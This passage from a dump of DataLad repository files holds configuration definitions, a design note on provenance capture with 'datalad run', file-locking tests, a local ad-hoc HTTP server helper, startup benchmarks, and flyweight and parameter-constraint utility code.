'default': 'auto',\n 'type': EnsureChoice('on', 'off', 'auto'),\n },\n 'datalad.ui.suppress-similar-results': {\n 'ui': ('question', {\n 'title': 'Suppress rendering of similar repetitive results',\n 'text': \"If enabled, after a certain number of subsequent \"\n \"results that are identical regarding key properties, \"\n \"such as 'status', 'action', and 'type', additional \"\n \"similar results are not rendered by the common result \"\n \"renderer anymore. Instead, a count \"\n \"of suppressed results is displayed. If disabled, or \"\n \"when not running in an interactive terminal, all results \"\n \"are rendered.\"}),\n 'default': True,\n 'type': EnsureBool(),\n },\n 'datalad.ui.suppress-similar-results-threshold': {\n 'ui': ('question', {\n 'title': 'Threshold for suppressing similar repetitive results',\n 'text': \"Minimum number of similar results to occur before \"\n \"suppression is considered. \"\n \"See 'datalad.ui.suppress-similar-results' for more \"\n \"information.\"}),\n 'default': 10,\n 'type': EnsureInt(),\n },\n 'datalad.save.no-message': {\n 'ui': ('question', {\n 'title': 'Commit message handling',\n 'text': 'When no commit message was provided: '\n 'attempt to obtain one interactively (interactive); '\n 'or use a generic commit message (generic). '\n 'NOTE: The interactive option is experimental. The '\n 'behavior may change in backwards-incompatible ways.'}),\n 'default': 'generic',\n 'type': EnsureChoice('interactive', 'generic'),\n },\n 'datalad.install.inherit-local-origin': {\n 'ui': ('question', {\n 'title': 'Inherit local origin of dataset source',\n 'text': \"If enabled, a local 'origin' remote of a local dataset \"\n \"clone source is configured as an 'origin-2' remote \"\n \"to make its annex automatically available. The process \"\n \"is repeated recursively for any further qualifying \"\n \"'origin' dataset thereof.\"\n \"Note that if clone.defaultRemoteName is configured \"\n \"to use a name other than 'origin', that name will be \"\n \"used instead.\"}),\n 'default': True,\n 'type': EnsureBool(),\n },\n 'datalad.save.windows-compat-warning': {\n 'ui': ('question', {\n 'title': 'Action when Windows-incompatible file names are saved',\n 'text': \"Certain characters or names can make file names \"\n \"incompatible with Windows. If such files are saved \"\n \"'warning' will alert users with a log message, 'error' \"\n \"will yield an 'impossible' result, and 'none' will \"\n \"ignore the incompatibility.\"}),\n 'type': EnsureChoice('warning', 'error', 'none'),\n 'default': 'warning',\n\n },\n 'datalad.source.epoch': {\n 'ui': ('question', {\n 'title': 'Datetime epoch to use for dates in built materials',\n 'text': \"Datetime to use for reproducible builds. Originally introduced \"\n \"for Debian packages to interface SOURCE_DATE_EPOCH described at \"\n \"https://reproducible-builds.org/docs/source-date-epoch/ .\"\n \"By default - current time\"\n }),\n 'type': EnsureFloat(),\n 'default': time.time(),\n\n },\n 'datalad.ssh.executable': {\n 'ui': ('question', {\n 'title': \"Name of ssh executable for 'datalad sshrun'\",\n 'text': \"Specifies the name of the ssh-client executable that\"\n \"datalad will use. This might be an absolute \"\n \"path. On Windows systems it is currently by default set \"\n \"to point to the ssh executable of OpenSSH for Windows, \"\n \"if OpenSSH for Windows is installed. On other systems it \"\n \"defaults to 'ssh'.\"}),\n 'destination': 'global',\n 'type': EnsureStr(),\n 'default_fn': get_default_ssh,\n }\n}\n\ndefinitions = _ConfigDefinitions()\n" }, { "alpha_fraction": 0.7558020353317261, "alphanum_fraction": 0.7583617568016052, "avg_line_length": 42.73134231567383, "blob_id": "09d36ad0e8d21202b4039553b22d754618724797", "content_id": "e034c39f1928456ab4d0d9bdee683eecd3c5e0e3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5860, "license_type": "permissive", "max_line_length": 101, "num_lines": 134, "path": "/docs/source/design/provenance_capture.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_provenance_capture:\n\n******************\nProvenance capture\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nThe ability to capture process provenance---the information what activity\ninitiated by which entity yielded which outputs, given a set of parameters, a\ncomputational environment, and potential input data---is a core feature of\nDataLad.\n\nProvenance capture is supported for any computational process that can be\nexpressed as a command line call. The simplest form of provenance tracking can\nbe implemented by prefixing any such a command line call with ``datalad run\n...``. When executed in the content of a dataset (with the current working\ndirectory typically being in the root of a dataset), DataLad will then:\n\n1. check the dataset for any unsaved modifications\n2. execute the given command, when no modifications were found\n3. save any changes to the dataset that exist after the command has exited without error\n\nThe saved changes are annotated with a structured record that, at minimum,\ncontains the executed command.\n\nThis kind of usage is sufficient for building up an annotated history of a\ndataset, where all relevant modifications are clearly associated with the\ncommands that caused them. By providing more, optional, information to the\n``run`` command, such as a declaration of inputs and outputs, provenance\nrecords can be further enriched. This enables additional functionality, such as\nthe automated re-execution of captured processes.\n\n\nThe provenance record\n=====================\n\nA DataLad provenance record is a key-value mapping comprising the following\nmain items:\n\n- ``cmd``: executed command, which may contain placeholders\n- ``dsid``: DataLad ID of dataset in whose context the command execution took place\n- ``exit``: numeric exit code of the command\n- ``inputs``: a list of (relative) file paths for all declared inputs\n- ``outputs``: a list of (relative) file paths for all declared outputs\n- ``pwd``: relative path of the working directory for the command execution\n\nA provenance record is stored in a JSON-serialized form in one of two locations:\n\n1. In the body of the commit message created when saving caused the dataset modifications\n2. In a sidecar file underneath ``.datalad/runinfo`` in the root dataset\n\nSidecar files have a filename (``record_id``) that is based on checksum of the\nprovenance record content, and are stored as LZMA-compressed binary files.\nWhen a sidecar file is used, its ``record_id`` is added to the commit message,\ninstead of the complete record.\n\n\nDeclaration of inputs and outputs\n=================================\n\nWhile not strictly required, it is possible and recommended to declare all\npaths for process inputs and outputs of a command execution via the respective\noptions of ``run``.\n\nFor all declared inputs, ``run`` will ensure that their file content is present\nlocally at the required version before executing the command.\n\nFor all declared outputs, ``run`` will ensure that the respective locations are\nwriteable.\n\nIt is recommended to declare inputs and outputs both exhaustively and precise,\nin order to enable the provenance-based automated re-execution of a command. In\ncase of a future re-execution the dataset content may have changed\nsubstantially, and a needlessly broad specification of inputs/outputs may lead\nto undesirable data transfers.\n\n\nPlaceholders in commands and IO specifications\n==============================================\n\nBoth command and input/output specification can employ placeholders that will\nbe expanded before command execution. Placeholders use the syntax of the Python\n``format()`` specification. A number of standard placeholders are supported\n(see the ``run`` documentation for a complete list):\n\n- ``{pwd}`` will be replaced with the full path of the current working directory\n- ``{dspath}`` will be replaced with the full path of the dataset that run is invoked on\n- ``{inputs}`` and ``{outputs}`` expand a space-separated list of the declared input and output paths\n\nAdditionally, custom placeholders can be defined as configuration variables\nunder the prefix ``datalad.run.substitutions.``. For example, a configuration\nsetting ``datalad.run.substitutions.myfile=data.txt`` will cause the\nplaceholder ``{myfile}`` to expand to ``data.txt``.\n\nSelection of individual items for placeholders that expand to multiple values\nis possible via the standard Python ``format()`` syntax, for example\n``{inputs[0]}``.\n\n\nResult records emitted by ``run``\n=================================\n\nWhen performing a command execution ``run`` will emit results for:\n\n1. Input preparation (i.e. downloads)\n2. Output preparation (i.e. unlocks and removals)\n3. Command execution\n4. Dataset modification saving (i.e. additions, deletions, modifications)\n\nBy default, ``run`` will stop on the first error. This means that, for example,\nany failure to download content will prevent command execution. A failing\ncommand will prevent saving a potential dataset modification. This behavior can\nbe altered using the standard ``on_failure`` switch of the ``run`` command.\n\nThe emitted result for the command execution contains the provenance record\nunder the ``run_info`` key.\n\n\nImplementation details\n======================\n\nMost of the described functionality is implemented by the function\n:func:`datalad.core.local.run.run_command`. It is interfaced by the ``run``\ncommand, but also ``rerun``, a utility for automated re-execution based on\nprovenance records, and ``containers-run`` (provided by the ``container``\nextension package) for command execution in DataLad-tracked containerized\nenvironments. This function has a more complex interface, and supports a wider\nrange of use cases than described here.\n" }, { "alpha_fraction": 0.6171975135803223, "alphanum_fraction": 0.6260533928871155, "avg_line_length": 36.84324264526367, "blob_id": "133aaf81252de6852d5b696a48eb77a75c0cc0ad", "content_id": "055dca8f790cde3dc65bfa7842aab7571a0c0794", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7001, "license_type": "permissive", "max_line_length": 115, "num_lines": 185, "path": "/datalad/support/tests/test_locking.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\nimport os\nimport os.path as op\nimport sys\nfrom pathlib import Path\nfrom time import time\n\nfrom fasteners import InterProcessLock\n\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n eq_,\n ok_,\n ok_exists,\n on_osx,\n with_tempfile,\n)\n\nfrom ...cmd import (\n CommandError,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom ...utils import ensure_unicode\nfrom ..locking import (\n lock_if_check_fails,\n try_lock_informatively,\n)\n\n\nclass Subproc:\n # By implementing this closure as a class instead of as a nested function,\n # it becomes possible to pickle it.\n\n def __init__(self, tempfile):\n self.tempfile = tempfile\n\n def __call__(self, q):\n with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\\\n as (_, lock2, acquired):\n # we used to check for .acquired here but it was removed from\n # fasteners API: https://github.com/harlowja/fasteners/issues/71\n q.put(acquired)\n\n\n@with_tempfile\ndef test_lock_if_check_fails(tempfile=None):\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(True, None) as (check, lock):\n assert check is True\n assert lock is None\n assert check # still available outside\n # and with a callable\n with lock_if_check_fails(lambda: \"valuable\", None) as (check, lock):\n eq_(check, \"valuable\")\n assert lock is None\n eq_(check, \"valuable\")\n\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(False, tempfile) as (check, lock):\n ok_(lock)\n ok_exists(tempfile + '.lck')\n assert not op.exists(tempfile + '.lck') # and it gets removed after\n\n # the same with providing operation\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):\n ok_(lock)\n ok_exists(tempfile + '.get-lck')\n assert not op.exists(tempfile + '.get-lck') # and it gets removed after\n\n from multiprocessing import (\n Process,\n Queue,\n )\n q = Queue()\n p = Process(target=Subproc(tempfile), args=(q,))\n\n # now we need somehow to actually check the bloody lock functioning\n with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):\n eq_(check, False)\n ok_(lock)\n ok_(acquired)\n # but now we will try to lock again, but we need to do it in another\n # process\n p.start()\n assert q.get() is False\n p.join()\n with open(tempfile, 'w') as f:\n pass\n ok_exists(tempfile)\n ok_exists(tempfile)\n\n # and we redo -- it will acquire it\n p = Process(target=Subproc(tempfile), args=(q,))\n p.start()\n ok_(q.get())\n p.join()\n\n\n@with_tempfile\ndef test_try_lock_informatively(tempfile=None):\n lock = InterProcessLock(tempfile + '.lck')\n lock_path = ensure_unicode(lock.path) # can be bytes, complicates string formattingetc\n t0 = time()\n with try_lock_informatively(lock, purpose=\"happy life\") as acquired:\n assert_true(lock.acquired)\n assert_true(acquired)\n assert_greater(2, time() - t0) # should not take any notable time, we cannot be blocking\n\n \"\"\"\n # InterProcessLock is not re-entrant so nesting should not be used, will result\n # in exception on release\n with try_lock_informatively(lock, timeouts=[dt, dt*2], proceed_unlocked=True) as acquired:\n assert_true(lock.acquired) # due to outer cm\n assert_true(acquired) # lock is reentrant apparently\n \"\"\"\n # Let's try in a completely different subprocess\n runner = WitlessRunner(env=dict(os.environ, DATALAD_LOG_LEVEL='info', DATALAD_LOG_TARGET='stderr'))\n\n script1 = Path(tempfile + \"-script1.py\")\n script1_fmt = f\"\"\"\nfrom fasteners import InterProcessLock\nfrom time import time\n\nfrom datalad.support.locking import try_lock_informatively\n\nlock = InterProcessLock({lock_path!r})\n\nwith try_lock_informatively(lock, timeouts=[0.05, 0.15], proceed_unlocked={{proceed_unlocked}}) as acquired:\n print(\"Lock acquired=%s\" % acquired)\n\"\"\"\n script1.write_text(script1_fmt.format(proceed_unlocked=True))\n t0 = time()\n res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in('Lock acquired=False', res['stdout'])\n assert_in(f'Failed to acquire lock at {lock_path} in 0.05', res['stderr'])\n assert_in(f'Failed to acquire lock at {lock_path} in 0.15', res['stderr'])\n assert_in('proceed without locking', res['stderr'])\n assert_greater(time() - t0, 0.19999) # should wait for at least 0.2\n try:\n import psutil\n\n # PID does not correspond\n assert_in('Check following process: PID=', res['stderr'])\n assert_in(f'CWD={os.getcwd()} CMDLINE=', res['stderr'])\n except ImportError:\n pass # psutil was not installed, cannot get list of files\n except AssertionError:\n # we must have had the other one then\n assert_in('failed to determine one', res['stderr'])\n if not on_osx:\n # so far we had only OSX reporting failing to get PIDs information\n # but if it is something else -- re-raise original exception\n raise\n\n # in 2nd case, lets try without proceeding unlocked\n script1.write_text(script1_fmt.format(proceed_unlocked=False))\n t0 = time()\n with assert_raises(CommandError) as cme:\n runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in(f\"Failed to acquire lock at {lock_path} in 2 attempts.\", str(cme.value))\n assert_in(f\"RuntimeError\", str(cme.value))\n assert_false(cme.value.stdout) # nothing there since print should not happen\n assert_in(f'Failed to acquire lock at {lock_path} in 0.05', cme.value.stderr)\n assert_in(f'Failed to acquire lock at {lock_path} in 0.15', cme.value.stderr)\n assert_greater(time() - t0, 0.19999) # should wait for at least 0.2\n\n # now that we left context, should work out just fine\n res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in('Lock acquired=True', res['stdout'])\n assert_not_in(f'Failed to acquire lock', res['stderr'])\n assert_not_in('PID', res['stderr'])\n" }, { "alpha_fraction": 0.644095778465271, "alphanum_fraction": 0.6498761177062988, "avg_line_length": 27.83333396911621, "blob_id": "21741509b5d361abfc49f931dfd22af02866d5ce", "content_id": "33d9561162936089dcf97e406b869d5e1a6b93fa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1211, "license_type": "permissive", "max_line_length": 78, "num_lines": 42, "path": "/tools/adhoc-httpd", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# Helper to launch an ad-hoc http server, with or without SSL enabled,\n# and with or without required basic authentication\n#\n# usage: adhoc-httpd <path-to-serve> [<ssl|nossl> [<user> <password>]]\n# examples:\n# % adhoc-httpd .\n# % adhoc-httpd /tmp ssl\n# % adhoc-httpd /tmp nossl myuser yourpassword\n\nimport sys\nfrom pathlib import Path\n\nfrom datalad.tests.utils_pytest import serve_path_via_http\n\npath = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.cwd()\nif not path.exists():\n raise ValueError(f'Path {path} does not exist')\n\nssl = 'nossl'\nuse_ssl = False\nif len(sys.argv) > 2:\n ssl = sys.argv[2]\n if ssl not in ('ssl', 'nossl'):\n raise ValueError('SSL argument must be \"ssl\" or \"nossl\"')\n use_ssl = ssl == 'ssl'\nauth = None\nif len(sys.argv) > 3:\n if len(sys.argv) != 5:\n raise ValueError(\n 'Usage to enable authentication: '\n 'adhoc-httpd <path-to-serve> <ssl|nossl <user> <password>')\n auth = tuple(sys.argv[3:])\n\n\n@serve_path_via_http(path, use_ssl=use_ssl, auth=auth)\ndef runner(path, url):\n print(f'Serving {path} at {url} [{ssl}] (required authentication {auth})')\n input(\"Hit Return to stop serving\")\n\n\nrunner()\n" }, { "alpha_fraction": 0.5962666869163513, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 25.785715103149414, "blob_id": "47b4d707ab94411e8f18f9e501a26d395a45a005", "content_id": "c421dfb2d48f89ae45ef8afec882ed4e70a153d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "permissive", "max_line_length": 79, "num_lines": 70, "path": "/benchmarks/core.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for DataLad\"\"\"\n\nimport os\nimport sys\nimport os.path as osp\n\nfrom subprocess import call\n\nfrom datalad.runner import (\n Runner,\n GitRunner,\n StdOutErrCapture,\n)\n\n\n# Some tracking example -- may be we should track # of datasets.datalad.org\n#import gc\n#def track_num_objects():\n# return len(gc.get_objects())\n#track_num_objects.unit = \"objects\"\n\n\nfrom .common import SuprocBenchmarks\n\nscripts_dir = osp.join(osp.dirname(__file__), 'scripts')\nheavyout_cmd = \"{} 1000\".format(osp.join(scripts_dir, 'heavyout'))\n\n\nclass startup(SuprocBenchmarks):\n \"\"\"\n Benchmarks for datalad commands startup\n \"\"\"\n\n def setup(self):\n # we need to prepare/adjust PATH to point to installed datalad\n # We will base it on taking sys.executable\n python_path = osp.dirname(sys.executable)\n self.env = os.environ.copy()\n self.env['PATH'] = '%s:%s' % (python_path, self.env.get('PATH', ''))\n\n def time_import(self):\n call([sys.executable, \"-c\", \"import datalad\"])\n\n def time_import_api(self):\n call([sys.executable, \"-c\", \"import datalad.api\"])\n\n\nclass witlessrunner(SuprocBenchmarks):\n \"\"\"Some rudimentary tests to see if there is no major slowdowns of Runner\n \"\"\"\n\n def setup(self):\n self.runner = Runner()\n self.git_runner = GitRunner()\n\n def time_echo(self):\n self.runner.run([\"echo\"])\n\n def time_echo_gitrunner(self):\n self.git_runner.run([\"echo\"])\n\n def time_echo_gitrunner_fullcapture(self):\n self.git_runner.run([\"echo\"], protocol=StdOutErrCapture)\n" }, { "alpha_fraction": 0.6124182343482971, "alphanum_fraction": 0.6185339093208313, "avg_line_length": 37.85148620605469, "blob_id": "615252e07e502eee77f4cc9378dfac244d43cd9f", "content_id": "1fb8bdc82a880d80bb23c2eb030cb250aad1c8e5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11777, "license_type": "permissive", "max_line_length": 104, "num_lines": 303, "path": "/datalad/dataset/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" utility classes for repositories\n\n\"\"\"\n\nimport logging\nimport threading\n\nfrom datalad.support.exceptions import InvalidInstanceRequestError\nfrom datalad.support.network import RI\nfrom datalad import utils as ut\n\nlgr = logging.getLogger('datalad.repo')\n\n\nclass Flyweight(type):\n \"\"\"Metaclass providing an implementation of the flyweight pattern.\n\n Since the flyweight is very similar to a singleton, we occasionally use this\n term to make clear there's only one instance (at a time).\n This integrates the \"factory\" into the actual classes, which need\n to have a class attribute `_unique_instances` (WeakValueDictionary).\n By providing an implementation of __call__, you don't need to call a\n factory's get_xy_repo() method to get a singleton. Instead this is called\n when you simply instantiate via MyClass(). So, you basically don't even need\n to know there were singletons. Therefore it is also less likely to sabotage\n the concept by not being aware of how to get an appropriate object.\n\n Multiple instances, pointing to the same physical repository can cause a\n lot of trouble. This is why this class exists. You should be very aware of\n the implications, if you want to circumvent that mechanism.\n\n To use this pattern, you need to add this class as a metaclass to the class\n you want to use it with. Additionally there needs to be a class attribute\n `_unique_instances`, which should be a `WeakValueDictionary`. Furthermore\n implement `_flyweight_id_from_args` method to determine, what should be the\n identifying criteria to consider two requested instances the same.\n\n Example:\n\n from weakref import WeakValueDictionary\n\n class MyFlyweightClass(object, metaclass=Flyweight):\n\n _unique_instances = WeakValueDictionary()\n\n @classmethod\n def _flyweight_id_from_args(cls, *args, **kwargs):\n\n id = kwargs.pop('id')\n return id, args, kwargs\n\n def __init__(self, some, someother=None):\n pass\n\n a = MyFlyweightClass('bla', id=1)\n b = MyFlyweightClass('blubb', id=1)\n assert a is b\n c = MyFlyweightClass('whatever', id=2)\n assert c is not a\n \"\"\"\n\n # to avoid parallel creation of (identical) instances\n _lock = threading.Lock()\n\n def _flyweight_id_from_args(cls, *args, **kwargs):\n \"\"\"create an ID from arguments passed to `__call__`\n\n Subclasses need to implement this method. The ID it returns is used to\n determine whether or not there already is an instance of that kind and\n as key in the `_unique_instances` dictionary.\n\n Besides the ID this should return args and kwargs, which can be modified\n herein and will be passed on to the constructor of a requested instance.\n\n Parameters\n ----------\n args:\n positional arguments passed to __call__\n kwargs:\n keyword arguments passed to __call__\n\n Returns\n -------\n hashable, args, kwargs\n id, optionally manipulated args and kwargs to be passed to __init__\n \"\"\"\n raise NotImplementedError\n\n # TODO: - We might want to remove the classmethod from Flyweight altogether and replace by an\n # requirement to implement an actual method, since the purpose of it is actually about a\n # particular, existing instance\n # - Done. But update docs!\n # def _flyweight_invalid(cls, id):\n # \"\"\"determines whether or not an instance with `id` became invalid and\n # therefore has to be instantiated again.\n #\n # Subclasses can implement this method to provide an additional condition\n # on when to create a new instance besides there is none yet.\n #\n # Parameter\n # ---------\n # id: hashable\n # ID of the requested instance\n #\n # Returns\n # -------\n # bool\n # whether to consider an existing instance with that ID invalid and\n # therefore create a new instance. Default implementation always returns\n # False.\n # \"\"\"\n # return False\n\n # TODO: document the suggestion to implement a finalizer!\n\n def _flyweight_reject(cls, id, *args, **kwargs):\n \"\"\"decides whether to reject a request for an instance\n\n This gives the opportunity to detect a conflict of an instance request\n with an already existing instance, that is not invalidated by\n `_flyweight_invalid`. In case the return value is not `None`, it will be\n used as the message for an `InvalidInstanceRequestError`,\n raised by `__call__`\n\n Parameters\n ----------\n id: hashable\n the ID of the instance in question as calculated by\n `_flyweight_id_from_args`\n args:\n kwargs:\n (keyword) arguments to the original call\n\n Returns:\n --------\n None or str\n \"\"\"\n return None\n\n def __call__(cls, *args, **kwargs):\n\n id_, new_args, new_kwargs = cls._flyweight_id_from_args(*args, **kwargs)\n # Thread lock following block so we do not fall victim to\n # race condition across threads trying to instantiate multiple\n # instances. In principle we better have a lock per id_ but that mean we\n # might race at getting \"name specific lock\" (Yarik did not research much),\n # so keeping it KISS -- just lock instantiation altogether, but could be\n # made smarter later on.\n with cls._lock:\n instance = cls._unique_instances.get(id_, None)\n\n if instance is None or instance._flyweight_invalid():\n # we have no such instance yet or the existing one is invalidated,\n # so we instantiate:\n instance = type.__call__(cls, *new_args, **new_kwargs)\n cls._unique_instances[id_] = instance\n else:\n # we have an instance already that is not invalid itself; check\n # whether there is a conflict, otherwise return existing one:\n # TODO\n # Note, that this might (and probably should) go away, when we\n # decide how to deal with currently possible invalid constructor\n # calls for the repo classes. In particular this is about calling\n # it with different options than before, that might lead to\n # fundamental changes in the repository (like annex repo version\n # change or re-init of git)\n\n # force? may not mean the same thing\n msg = cls._flyweight_reject(id_, *new_args, **new_kwargs)\n if msg is not None:\n raise InvalidInstanceRequestError(id_, msg)\n return instance\n\n\nclass PathBasedFlyweight(Flyweight):\n\n def _flyweight_preproc_path(cls, path):\n \"\"\"perform any desired path preprocessing (e.g., aliases)\n\n By default nothing is done\n \"\"\"\n return path\n\n def _flyweight_postproc_path(cls, path):\n \"\"\"perform any desired path post-processing (e.g., dereferencing etc)\n\n By default - realpath to guarantee reuse. Derived classes (e.g.,\n Dataset) could override to allow for symlinked datasets to have\n individual instances for multiple symlinks\n \"\"\"\n # resolve symlinks to make sure we have exactly one instance per\n # physical repository at a time\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n resolved = str(ut.Path(path).resolve().absolute())\n if ut.on_windows and resolved.startswith('\\\\\\\\'):\n # resolve() ended up converting a mounted network drive into a UNC path.\n # such paths are not supoprted (e.g. as cmd.exe CWD), hence redo and take\n # absolute path at face value. This has the consequence we cannot determine\n # repo duplicates mounted on different drives, but this is no worse than\n # on UNIX\n return str(ut.Path(path).absolute())\n return resolved\n\n def _flyweight_id_from_args(cls, *args, **kwargs):\n\n if args:\n # to a certain degree we need to simulate an actual call to __init__\n # and make sure, passed arguments are fitting:\n # TODO: Figure out, whether there is a cleaner way to do this in a\n # generic fashion\n assert('path' not in kwargs)\n path = args[0]\n args = args[1:]\n elif 'path' in kwargs:\n path = kwargs.pop('path')\n else:\n raise TypeError(\"__init__() requires argument `path`\")\n\n if path is None:\n lgr.debug(\"path is None. args: %s, kwargs: %s\", args, kwargs)\n raise ValueError(\"path must not be None\")\n\n # Custom handling for few special abbreviations if defined by the class\n path_ = cls._flyweight_preproc_path(path)\n\n # Sanity check for argument `path`:\n # raise if we cannot deal with `path` at all or\n # if it is not a local thing:\n localpath = RI(path_).localpath\n\n path_postproc = cls._flyweight_postproc_path(localpath)\n\n kwargs['path'] = path_postproc\n return path_postproc, args, kwargs\n # End Flyweight\n\n\n\n# TODO: see issue #1100\nclass RepoInterface(object):\n \"\"\"common operations for annex and plain git repositories\n\n Especially provides \"annex operations\" on plain git repos, that just do\n (or return) the \"right thing\"\n \"\"\"\n\n # Note: Didn't find a way yet, to force GitRepo as well as AnnexRepo to\n # implement a method defined herein, since AnnexRepo inherits from GitRepo.\n # Would be much nicer, but still - I'd prefer to have a central place for\n # these anyway.\n\n # Note 2: Seems possible. There is MRO magic:\n # http://pybites.blogspot.de/2009/01/mro-magic.html\n # http://stackoverflow.com/questions/20822850/change-python-mro-at-runtime\n\n # Test!\n pass\n\n\ndef path_based_str_repr(cls):\n \"\"\"A helper decorator for a class to define str and repr based on its .path\n\n For the rationale/discussion on why to bother distinguishing the two is\n in https://github.com/datalad/datalad/pull/4439 . The idea is that\n `__str__` should provide cut/pasteable to shell representation of the path,\n with all necessary escapes for characters shell might care about.\n `__repr__` to provide string representation consumable in Python.\n \"\"\"\n\n # %s is used over .format since it is more performant. In Python 3.7.6 I get\n # In [2]: %timeit \"%s\" % (\"buga\")\n # 29 ns ± 0.179 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)\n # In [3]: %timeit \"{}\".format(\"buga\")\n # 62 ns ± 0.345 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)\n # and similarly 58ns vs 97ns for %r vs !r\n def __str__(self):\n s = self._str\n if s is None:\n s = self._str = \\\n '%s(%s)' % (self.__class__.__name__, ut.quote_cmdlinearg(self.path))\n return s\n\n def __repr__(self):\n s = self._repr\n if s is None:\n s = self._repr = \\\n '%s(%r)' % (self.__class__.__name__, self.path)\n return s\n\n cls._str = None\n cls.__str__ = __str__\n cls._repr = None\n cls.__repr__ = __repr__\n return cls\n\n" }, { "alpha_fraction": 0.5708310604095459, "alphanum_fraction": 0.5719281435012817, "avg_line_length": 28.582149505615234, "blob_id": "519cd4f9c05a4c1937c2eba550077c62806d0dca", "content_id": "623fab363cec3d298cf5b9f42efe058ed9bf8961", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14584, "license_type": "permissive", "max_line_length": 87, "num_lines": 493, "path": "/datalad/support/constraints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper for parameter validation, documentation and conversion\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport re\n\n\ndef _strip_typerepr(s):\n \"\"\"Strip away <class '...'> and <type '...'> decorations for docstrings\n \"\"\"\n return re.sub(r\"<(class|type) '(\\S+)'>\", r'\\2', s)\n\n\ndef _type_str(t):\n \"\"\"Get string human-readable representation of a data type\n\n If type (t) is given as a tuple, assume ability to choose any of the\n listed types, so those types listing get joined with |\n \"\"\"\n if isinstance(t, tuple):\n s = ' or '.join(map(_type_str, t))\n return (\"(%s)\" % s) if len(t) > 1 else s\n return _strip_typerepr(str(t))\n\n\nclass _NoneDeprecated:\n \"\"\"A helper construct to ease migrations for option=None.\n\n Should be instantiated, so it gains `__repr__` and thus would render nicely\n in docs etc.\n \"\"\"\n def __repr__(self):\n return 'None(DEPRECATED)'\n\n\nNoneDeprecated = _NoneDeprecated()\n\n\nclass Constraint(object):\n \"\"\"Base class for input value conversion/validation.\n\n These classes are also meant to be able to generate appropriate\n documentation on an appropriate parameter value.\n \"\"\"\n\n # TODO: __str__ and/or __repr__ for every one of them\n\n def __repr__(self):\n \"\"\"Rudimentary repr to avoid default scary to the user Python repr\"\"\"\n return \"constraint:%s\" % self.short_description()\n\n def __and__(self, other):\n return Constraints(self, other)\n\n def __or__(self, other):\n return AltConstraints(self, other)\n\n def __call__(self, value):\n # do any necessary checks or conversions, potentially catch exceptions\n # and generate a meaningful error message\n raise NotImplementedError(\"abstract class\")\n\n def long_description(self):\n # return meaningful docs or None\n # used as a comprehensive description in the parameter list\n return self.short_description()\n\n def short_description(self):\n # return meaningful docs or None\n # used as a condensed primer for the parameter lists\n raise NotImplementedError(\"abstract class\")\n\n\nclass EnsureDType(Constraint):\n \"\"\"Ensure that an input (or several inputs) are of a particular data type.\n \"\"\"\n # TODO extend to support numpy-like 